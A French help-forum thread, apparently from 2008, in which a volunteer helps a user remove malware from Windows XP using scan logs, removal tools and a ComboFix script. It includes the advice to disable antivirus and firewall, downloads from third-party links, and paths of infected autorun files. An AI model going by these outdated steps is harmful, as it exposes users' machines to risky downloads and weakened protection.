O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/yinst20040510.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Fichiers communs\Microsoft Shared\Help\hxds.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O18 - Filter hijack: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\FICHIE~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: OdysseyClient - C:\WINDOWS\SYSTEM32\odyEvent.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: Eset HTTP Server (EHttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Odyssey Client for Fujitsu Siemens Computers (odClientService) - Funk Software, Inc. - C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
ok

plusieurs infections!

colles les deux rapports:

https://77b4795d-a-62cb3a1a-s-sites.googlegroups.com/site/eric71mespages/ToolBarSD.exe?attachauth=ANoY7cqJWPphpudyTqv7TRo5RQ3nm_Sx8JluVMO59X5E9cyE3j3LqKlmStIqiDqJdIgMJLi7MXn2nKVajQfoWuVvZZ2wIx_vkqO4k4P0K9jh-ra9jaKPXdZcoaVF2UqJZNH8ubL_42uIwh6f35xJ2GJMuzddVj2Qth1DgZ839lxEIFGkgWz3TdfvNMy-YtxfA3gqBUrj4U4LFeAPiWr3ClmjIP0t_Xs5PQ%3D%3D&attredirects=2

* Lance l'installation du programme en exécutant le fichier téléchargé.
* Double-clique maintenant sur le raccourci de Toolbar-S&D.
* Sélectionne la langue souhaitée en tapant la lettre de ton choix puis en validant avec la touche Entrée.
* Choisis maintenant l'option 1 (Recherche). Patiente jusqu'à la fin de la recherche.
* Poste le rapport généré. (C:\TB.txt)

________________

http://perso.orange.fr/il.mafioso/Navifix/Navilog1.exe

Télécharger sur le bureau
Navilog.zip
= Double-Clic navilog1.zip
= Extraire tout sur le bureau
= Double-Clic navilog1 qui est sur le bureau
= Appuyer sur une touche jusqu' arriver aux options
= Choisir option 1

un rapport : fixnavi.txt dans C : va se creer
le copier/coller dans ton prochain message.
0
Réponse 6 / 50
waeeeeeelllll
 
ok merci

-----------\\ ToolBar S&D 1.1.6 XP/Vista

Microsoft Windows XP Édition familiale ( v5.1.2600 ) Service Pack 2
X86-based PC ( Uniprocessor Free : Intel(R) Pentium(R) M processor 1.60GHz )
BIOS : Phoenix NoteBIOS 4.0 Release 6.0
USER : walid ( Administrator )
BOOT : Normal boot

"C:\ToolBar SD" ( MAJ : 27-08-2008|23:35 )
Option : [1] ( 28/08/2008|13:27 )

-----------\\ Recherche de Fichiers / Dossiers ...

-----------\\ [..\Internet Explorer\Main]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Local Page"="C:\\WINDOWS\\system32\\blank.htm"
"Start Page"="https://www.google.com/?gws_rd=ssl"
"Search Page"="https://www.google.com/?gws_rd=ssl"
"Search Bar"="http://www.google.com/toolbar/ie8/sidebar.html"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="https://fr.yahoo.com/"
"Default_Search_URL"="http://www.google.com/toolbar/ie8/sidebar.html"
"Search Page"="https://www.google.com/?gws_rd=ssl"
"Start Page"="https://www.google.com/?gws_rd=ssl"
"SearchAssistant"="http://www.crawler.com/search/ie.aspx?tb_id=66005"
"CustomizeSearch"="http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005"

--------------------\\ Recherche d'autres infections

--------------------\\ Cracks & Keygens ..

C:\DOCUME~1\walid\Application Data\Real\RealPlayer\History\Pilotes Crack Musik feat. Hamz.lnk
C:\DOCUME~1\walid\Bureau\WAEL\music\11-rim-k-pilotes_crack_musik_feat._hamza.mp3

-----------\\ Fin du rapport a 13:28:46,08
0
raphy00 Messages postés 1112 Statut Membre 9
 
Il sert jamais a rien cet outil...
0
Réponse 7 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
ok colle le rapport navilog

et vire ces fichiers

C:\DOCUME~1\walid\Application Data\Real\RealPlayer\History\Pilotes Crack Musik feat. Hamz.lnk
C:\DOCUME~1\walid\Bureau\WAEL\music\11-rim-k-pilotes_crack_musik_feat._hamza.mp3

____________

télécharge OTMoveIt
http://download.bleepingcomputer.com/oldtimer/OTMoveIt2.exe (de Old_Timer) sur ton Bureau. Ou sur https://www.luanagames.com/index.fr.html
double-clique sur OTMoveIt.exe pour le lancer.
copie la liste qui se trouve en citation ci-dessous,
et colle-la dans le cadre de gauche de OTMoveIt :Paste List of Files/Folders to be moved.

Citation :
C:\WINDOWS\system32\amvo.exe
C:\Program Files\AskBarFr

clique sur MoveIt! pour lancer la suppression.
le résultat apparaitra dans le cadre "Results".
clique sur Exit pour fermer.
poste le rapport situé dans C:\_OTMoveIt\MovedFiles.

il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.
0
Réponse 8 / 50
waeeeeeelllll
 
voici la deuxiemme rappart

merci pout tous

Search Navipromo version 3.6.5 commencé le 28/08/2008 à 13:35:21,73

!!! Attention,ce rapport peut indiquer des fichiers/programmes légitimes!!!
!!! Postez ce rapport sur le forum pour le faire analyser !!!
!!! Ne lancez pas la partie désinfection sans l'avis d'un spécialiste !!!

Outil exécuté depuis C:\Program Files\navilog1
Session actuelle : "walid"

Mise à jour le 22.08.2008 à 17h30 par IL-MAFIOSO

Microsoft Windows XP [version 5.1.2600]
Internet Explorer : 6.0.2900.2180
Système de fichiers : NTFS

Recherche executé en mode normal

*** Recherche Programmes installés ***

Favorit

*** Recherche dossiers dans "C:\WINDOWS" ***

*** Recherche dossiers dans "C:\Program Files" ***

*** Recherche dossiers dans "C:\Documents and Settings\All Users\menudm~1\progra~1" ***

*** Recherche dossiers dans "C:\Documents and Settings\All Users\menudm~1" ***

*** Recherche dossiers dans "c:\docume~1\alluse~1\applic~1" ***

*** Recherche dossiers dans "C:\Documents and Settings\walid\applic~1" ***

*** Recherche dossiers dans "C:\DOCUME~1\INVIT~1\applic~1" ***

*** Recherche dossiers dans "C:\Documents and Settings\walid\locals~1\applic~1" ***

*** Recherche dossiers dans "C:\DOCUME~1\INVIT~1\locals~1\applic~1" ***

*** Recherche dossiers dans "C:\Documents and Settings\walid\menudm~1\progra~1" ***

*** Recherche dossiers dans "C:\DOCUME~1\INVIT~1\menudm~1\progra~1" ***

*** Recherche avec Catchme-rootkit/stealth malware detector par gmer ***
pour + d'infos : http://www.gmer.net

*** Recherche avec GenericNaviSearch ***
!!! Tous ces résultats peuvent révéler des fichiers légitimes !!!
!!! A vérifier impérativement avant toute suppression manuelle !!!

* Recherche dans "C:\WINDOWS\system32" *

* Recherche dans "C:\Documents and Settings\walid\locals~1\applic~1" *

* Recherche dans "C:\DOCUME~1\INVIT~1\locals~1\applic~1" *

*** Recherche fichiers ***

*** Recherche clés spécifiques dans le Registre ***

HKEY_CURRENT_USER\Software\Lanconfig trouvé !

*** Module de Recherche complémentaire ***
(Recherche fichiers spécifiques)

1)Recherche nouveaux fichiers Instant Access :

2)Recherche Heuristique :

* Dans "C:\WINDOWS\system32" :

* Dans "C:\Documents and Settings\walid\locals~1\applic~1" :

* Dans "C:\DOCUME~1\INVIT~1\locals~1\applic~1" :

3)Recherche Certificats :

Certificat Egroup trouvé !
Certificat Electronic-Group trouvé !
Certificat Montorgueil absent !
Certificat OOO-Favorit trouvé !
Certificat Sunny-Day-Design-Ltd absent !

4)Recherche fichiers connus :

*** Analyse terminée le 28/08/2008 à 13:42:07,10 ***
0
Réponse 9 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
ok
relance navilog et choisi l'option 2

_______________

et vire ces fichiers

C:\DOCUME~1\walid\Application Data\Real\RealPlayer\History\Pilotes Crack Musik feat. Hamz.lnk
C:\DOCUME~1\walid\Bureau\WAEL\music\11-rim-k-pilotes_crack_m­usik_feat._hamza.mp3

____________

télécharge combofix (par sUBs) ici :

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

et enregistre le sur le bureau.

déconnecte toi d'internet et ferme toutes tes applications.

désactive tes protections (antivirus, parefeu, garde en temps réel de l'antispyware)

double-clique sur combofix.exe et suis les instructions

à la fin, il va produire un rapport C:\ComboFix.txt

réactive ton parefeu, ton antivirus, la garde de ton antispyware

copie/colle le rapport C:\ComboFix.txt dans ta prochaine réponse.

Attention, n'utilise pas ta souris ni ton clavier (ni un autre système de pointage) pendant que le programme tourne. Cela pourrait figer l'ordi.

Tu as un tutoriel complet ici :

https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

____________

télécharge OTMoveIt
http://download.bleepingcomputer.com/oldtimer/OTMoveIt2.exe (de Old_Timer) sur ton Bureau. Ou sur https://www.luanagames.com/index.fr.html
double-clique sur OTMoveIt.exe pour le lancer.
copie la liste qui se trouve en citation ci-dessous,
et colle-la dans le cadre de gauche de OTMoveIt :Paste List of Files/Folders to be moved.

Citation :
C:\WINDOWS\system32\amvo.exe
C:\Program Files\AskBarFr

clique sur MoveIt! pour lancer la suppression.
le résultat apparaitra dans le cadre "Results".
clique sur Exit pour fermer.
poste le rapport situé dans C:\_OTMoveIt\MovedFiles.

il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.
0
Réponse 10 / 50
waeeeeeelllll
 
voici le rapport

ComboFix 08-08-27.05 - walid 2008-08-28 14:19:28.1 - NTFSx86
Microsoft Windows XP Édition familiale 5.1.2600.2.1252.1.1036.18.568 [GMT 2:00]
Endroit: C:\Documents and Settings\walid\Bureau\ComboFix.exe
* Création d'un nouveau point de restauration

[color=red][b]AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !![/b][/color]
.

(((((((((((((((((((((((((((((((((((( Autres suppressions ))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\autorun.inf
C:\Documents and Settings\walid\Application Data\macromedia\Flash Player\#SharedObjects\8PNPVATA\bin.clearspring.com
C:\Documents and Settings\walid\Application Data\macromedia\Flash Player\#SharedObjects\8PNPVATA\bin.clearspring.com\clearspring.sol
C:\Documents and Settings\walid\Application Data\macromedia\Flash Player\#SharedObjects\8PNPVATA\bin.clearspring.com\ws\wan\wanLib.swf\47a76044b6216451.sol
C:\Documents and Settings\walid\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com
C:\Documents and Settings\walid\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com\settings.sol
C:\Documents and Settings\walid\Cookies\walid@casinotropez[2].txt
C:\Documents and Settings\walid\Cookies\walid@www.chat-land[1].txt
C:\Documents and Settings\walid\Cookies\walid@www.chat-land[2].txt

.
((((((((((((((((((((((((((((( Fichiers cr‚‚s 2008-07-28 to 2008-08-28 ))))))))))))))))))))))))))))))))))))
.

2008-08-28 13:34 . 2008-08-28 13:42 <REP> d-------- C:\Program Files\Navilog1
2008-08-28 13:28 . 2008-08-28 14:04 2,220 --a------ C:\Documents and Settings\Orph.egd
2008-08-28 13:26 . 2008-08-28 14:04 <REP> d-------- C:\ToolBar SD
2008-08-28 12:48 . 2008-08-28 12:48 <REP> d-------- C:\Program Files\Trend Micro
2008-08-25 16:52 . 2008-08-25 16:52 <REP> d-------- C:\Documents and Settings\walid\Application Data\Malwarebytes
2008-08-25 16:52 . 2008-08-25 16:52 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-08-25 02:17 . 2008-08-25 02:17 <REP> d-------- C:\Documents and Settings\walid\Application Data\Babylon
2008-08-25 02:17 . 2008-08-25 02:17 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Babylon
2008-08-25 00:52 . 2008-08-27 23:19 <REP> d-------- C:\Program Files\SUPERAntiSpyware
2008-08-25 00:50 . 2008-08-25 00:50 <REP> d-------- C:\Documents and Settings\walid\Application Data\DivX
2008-08-25 00:44 . 2008-08-25 00:44 28,672 --a------ C:\WINDOWS\system32\ncmd.exe
2008-08-25 00:43 . 2008-04-28 01:25 337,417 --ahs---- C:\WINDOWS\system32\SpiderH.vbs
2008-08-24 00:59 . 2008-08-24 01:06 <REP> d--h----- C:\LG3G
2008-08-24 00:58 . 2008-08-24 00:58 <REP> d-------- C:\Documents and Settings\walid\Application Data\LG Electronics
2008-08-24 00:54 . 2008-08-24 00:55 <REP> d-------- C:\Program Files\DivX
2008-08-24 00:53 . 2008-08-24 00:53 <REP> d-------- C:\Program Files\LG Electronics
2008-08-24 00:53 . 2007-07-11 10:45 21,632 --a------ C:\WINDOWS\system32\drivers\lgusbmodem.sys
2008-08-24 00:53 . 2007-07-11 15:51 19,840 --a------ C:\WINDOWS\system32\drivers\lgusbdiag.sys
2008-08-24 00:53 . 2007-07-11 10:40 12,416 --a------ C:\WINDOWS\system32\drivers\lgusbbus.sys
2008-08-24 00:52 . 2008-08-24 00:52 <REP> d-------- C:\Program Files\LG PC Suite 2
2008-08-24 00:51 . 2008-08-24 00:51 <REP> d-------- C:\Documents and Settings\walid\Application Data\InstallShield
2008-08-21 13:17 . 2008-08-21 13:22 <REP> d-------- C:\Program Files\YouTube Video Downloader
2008-08-16 11:13 . 2008-08-27 23:19 <REP> d-------- C:\Documents and Settings\walid\Application Data\SUPERAntiSpyware.com
2008-08-16 11:13 . 2008-08-16 11:13 <REP> d-------- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2008-08-06 20:52 . 2008-08-27 23:17 <REP> d-------- C:\Program Files\a-squared Anti-Malware
2008-07-30 00:47 . 2004-08-04 00:54 21,504 --a------ C:\WINDOWS\system32\hidserv.dll
2008-07-30 00:47 . 2004-08-04 00:54 21,504 --a--c--- C:\WINDOWS\system32\dllcache\hidserv.dll
2008-07-30 00:47 . 2004-08-04 00:45 14,848 --a------ C:\WINDOWS\system32\drivers\kbdhid.sys
2008-07-30 00:47 . 2004-08-04 00:45 14,848 --a--c--- C:\WINDOWS\system32\dllcache\kbdhid.sys

.
(((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-08-28 12:23 --------- d-----w C:\Documents and Settings\walid\Application Data\skypePM
2008-08-28 12:23 --------- d-----w C:\Documents and Settings\walid\Application Data\Skype
2008-08-28 10:31 --------- d-----w C:\Program Files\Spybot - Search & Destroy
2008-08-28 10:29 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-08-27 12:23 --------- d-----w C:\Documents and Settings\walid\Application Data\WinEdt
2008-08-23 22:53 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-08-23 22:53 --------- d-----w C:\Program Files\Fichiers communs\InstallShield
2008-08-15 12:00 --------- d-----w C:\Documents and Settings\All Users\Application Data\Microsoft Help
2008-07-24 22:57 --------- d-----w C:\Documents and Settings\All Users\Application Data\WinZip
2008-07-21 08:17 5,632 ----a-w C:\WINDOWS\system32\drivers\StarOpen.sys
2008-07-19 11:56 --------- d-----w C:\Documents and Settings\walid\Application Data\VersionTracker Pro
2008-07-19 11:47 --------- d-----w C:\Program Files\TechTracker
2008-07-19 10:02 --------- d-----w C:\Program Files\Java
2008-07-18 15:19 --------- d-----w C:\Program Files\CamStudio
2008-06-02 11:02 164 ----a-w C:\install.dat
2008-04-30 22:43 940 ----a-w C:\Documents and Settings\walid\Application Data\filterclsid.dat
2008-03-06 18:16 32 ----a-w C:\Documents and Settings\All Users\Application Data\ezsid.dat
2008-04-27 23:25 337,417 --sha-w C:\WINDOWS\system32\SpiderH.vbs
.

((((((((((((((((((((((((((((((((( Point de chargement Reg )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* les ‚l‚ments vides & les ‚l‚ments initiaux l‚gitimes ne sont pas list‚s
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{5A074B29-F830-49de-A31B-26E51D6FD4D9}"= "C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll" [2008-03-05 14:57 238544]

[HKEY_CLASSES_ROOT\clsid\{5a074b29-f830-49de-a31b-26e51d6fd4d9}]
[HKEY_CLASSES_ROOT\TypeLib\{5A074B20-F830-49de-A31B-26E51D6FD4D9}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{5A074B29-F830-49DE-A31B-26E51D6FD4D9}"= "C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll" [2008-03-05 14:57 238544]

[HKEY_CLASSES_ROOT\clsid\{5a074b29-f830-49de-a31b-26e51d6fd4d9}]
[HKEY_CLASSES_ROOT\TypeLib\{5A074B20-F830-49de-A31B-26E51D6FD4D9}]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-05 14:00 15360]
"MsnMsgr"="C:\Program Files\MSN Messenger\MsnMsgr.Exe" [2007-09-04 23:40 6856704]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2008-02-06 19:21 21898024]
"updateMgr"="C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 16:45 313472]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe" [2008-06-01 13:36 171448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe" [2008-06-10 04:27 144784]
"SiSUSBRG"="C:\WINDOWS\SiSUSBrg.exe" [2002-07-12 19:15 106496]
"IgfxTray"="C:\WINDOWS\system32\igfxtray.exe" [2005-02-08 05:36 155648]
"HotKeysCmds"="C:\WINDOWS\system32\hkcmd.exe" [2005-02-08 05:32 126976]
"Apoint"="C:\Program Files\Apoint2K\Apoint.exe" [2003-12-05 08:22 159744]
"PowerManager"="C:\Program Files\Power Manager\PM.exe" [2005-03-30 16:07 159744]
"OdTray.exe"="C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe" [2005-05-18 16:14 1015871]
"DeviceDiscovery"="C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe" [2002-12-02 21:56 40960]
"TkBellExe"="C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" [2008-02-27 18:41 185896]
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50 155648]
"HPDJ Taskbar Utility"="C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe" [2003-03-11 12:08 172032]
"HP Software Update"="C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe" [2002-12-17 11:40 49152]
"SpiderH"="C:\WINDOWS\system32\SpiderH.vbs" [2008-04-28 01:25 337417]
"SoundMan"="SOUNDMAN.EXE" [2005-01-20 15:04 77824 C:\WINDOWS\SOUNDMAN.EXE]
"AGRSMMSG"="AGRSMMSG.exe" [2004-07-22 08:38 88361 C:\WINDOWS\AGRSMMSG.exe]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2004-08-05 14:00 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\OdysseyClient]
2008-01-10 09:49 106496 C:\WINDOWS\system32\odyEvent.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
SecurityProviders msapsspc.dllschannel.dlldigest.dllmsnsspc.dll

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpCtr.exe"=
"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Real\\RealPlayer\\realplay.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"443:UDP"= 443:UDP:*:Disabled:UDP port 443 ooVoo
"37674:TCP"= 37674:TCP:*:Disabled:TCP port 37674 ooVoo
"37674:UDP"= 37674:UDP:*:Disabled:UDP port 37674 ooVoo
"37675:UDP"= 37675:UDP:*:Disabled:UDP port 37675 ooVoo

R3 odysseyIM4;Odyssey Network Agent Miniport;C:\WINDOWS\system32\DRIVERS\odysseyIM4.sys [2005-05-18 14:52]
S3 Boonty Games;Boonty Games;C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe [2005-05-24 14:36]
S3 EKBfltr;ENE Keyboard Controller;C:\WINDOWS\system32\DRIVERS\EKBfltr.sys [2005-01-14 12:22]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{35320280-ef7f-11dc-a24c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\n2de.cmd
\Shell\explore\Command - E:\n2de.cmd
\Shell\open\Command - E:\n2de.cmd

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{35320288-ef7f-11dc-a24c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\LaunchU3.exe -a

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6672f410-722d-11dd-a521-0012f0d3a1cd}]
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL Wallpaper.vbs
\Shell\Explore\Command - Wscript \Wallpaper.vbs
\Shell\Open\Command - Wscript \Wallpaper.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{8f870262-1851-11dd-a30a-0012f0d3a1cd}]
\Shell\??\command - taipingtianguov1.1.exe
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL taipingtianguov1.1.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b393b590-b5d4-11da-a260-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\3o.exe
\Shell\explore\Command - E:\3o.exe
\Shell\open\Command - E:\3o.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d49a7440-c366-11dc-a190-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\bpu.exe
\Shell\explore\Command - E:\bpu.exe
\Shell\open\Command - E:\bpu.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{dfdee880-b5c4-11da-a25f-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\3o.exe
\Shell\explore\Command - E:\3o.exe
\Shell\open\Command - E:\3o.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{fe2f1d10-ec8a-11dc-a23c-0012f0d3a1cd}]
\Shell\AutoRun\command - E:\x6.bat
\Shell\explore\Command - E:\x6.bat
\Shell\open\Command - E:\x6.bat
.
Contenu du dossier 'Scheduled Tasks/Tƒches planifi‚es'
.
.
------- Supplementary Scan -------
.
R0 -: HKCU-Main,Start Page = hxxp://www.google.com
R0 -: HKCU-Main,Search Page = hxxp://www.google.com
R0 -: HKCU-Main,Search Bar = hxxp://www.google.com/ie
R0 -: HKLM-Main,Default_Search_URL = hxxp://www.google.com/ie
R0 -: HKLM-Main,Start Page = hxxp://www.google.com
R1 -: HKCU-Internet Connection Wizard,ShellNext = iexplore
R0 -: HKCU-Search,SearchAssistant = hxxp://www.google.com/ie
R1 -: HKCU-SearchURL,(Default) = hxxp://www.google.com/search?q=%s
R0 -: HKLM-Search,SearchAssistant = hxxp://www.google.com/ie
O8 -: &Enregistrer cette page dans MonAsk - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savewebpage.html
O8 -: &Enregistrer l'image dans MonAsk - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimages.html
O8 -: &Enregistrer l'image dans un dossier - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimagetofolder.html
O8 -: &Enregistrer la page dans un dossier… - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savepagetofolder.html
O8 -: &Enregistrer le lien dans MonAsk - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savelink.html
O8 -: &Enregistrer le lien dans un dossier - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveltof.html
O8 -: &Windows Live Search - C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 -: E&xporter vers Microsoft Excel - C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
.

**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-28 14:23:26
Windows 5.1.2600 Service Pack 2 NTFS

Balayage processus cach‚s ...

Balayage cach‚ autostart entries ...

Balayage des fichiers cach‚s ...

Scan termin‚ avec succŠs
Les fichiers cach‚s: 0

**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\WINDOWS\system32\wscript.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Apoint2K\ApntEx.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\WINDOWS\system32\wscntfy.exe
.
**************************************************************************
.
Temps d'accomplissement: 2008-08-28 14:26:43 - machine was rebooted
ComboFix-quarantined-files.txt 2008-08-28 12:26:40

Pre-Run: 65,189,556,224 octets libres
Post-Run: 65,538,220,032 octets libres

214 --- E O F --- 2008-08-15 12:00:50
0
Réponse 11 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
Télécharge RavAntivirus d'Evosla :
http://ww25.evosla.com/compteur.php?soft=rav_antivirus

# Si tu as une clé USB, disque dur externe, etc, branche-les sans les ouvrir avant de lancer ce FIX
# Fais un clic droit sur le fichier .ZIP > Extraire sur > le Bureau
# Doucle-clique sur >> RAV.exe << afin de lancer l'outil.
# Une fois RAV ANTIVIRUS lancé, laisse-le réagir , il scanne automatiquement tout les lecteurs (disques fixes et amovibles)
# Si infection > un log s'établira, sinon le soft affichera (très rapide) ==>Votre Ordinateur est sain .
# Retire tes disques amovibles et redémarrez votre ordinateur.
# Poste le rapport, si infection!

_____________________

Ferme tout tes navigateurs (donc copie ou imprime les instructions avant)

Crée un nouveau document texte : clic droit de souris sur le bureau > Nouveau > Document Texte, et copie dedans les lignes suivantes :

File::
C:\WINDOWS\system32\SpiderH.vbs
C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll

Registry::
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{5A074B29-F830-49de-A31B-26E51D6FD4D9}"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{5A074B29-F830-49DE-A31B-26E51D6FD4D9}"=-

Enregistre ce fichier sous le nom CFscript

Fait un glisser/déposer de ce fichier CFscrïpt sur le fichier ComboFix.exe

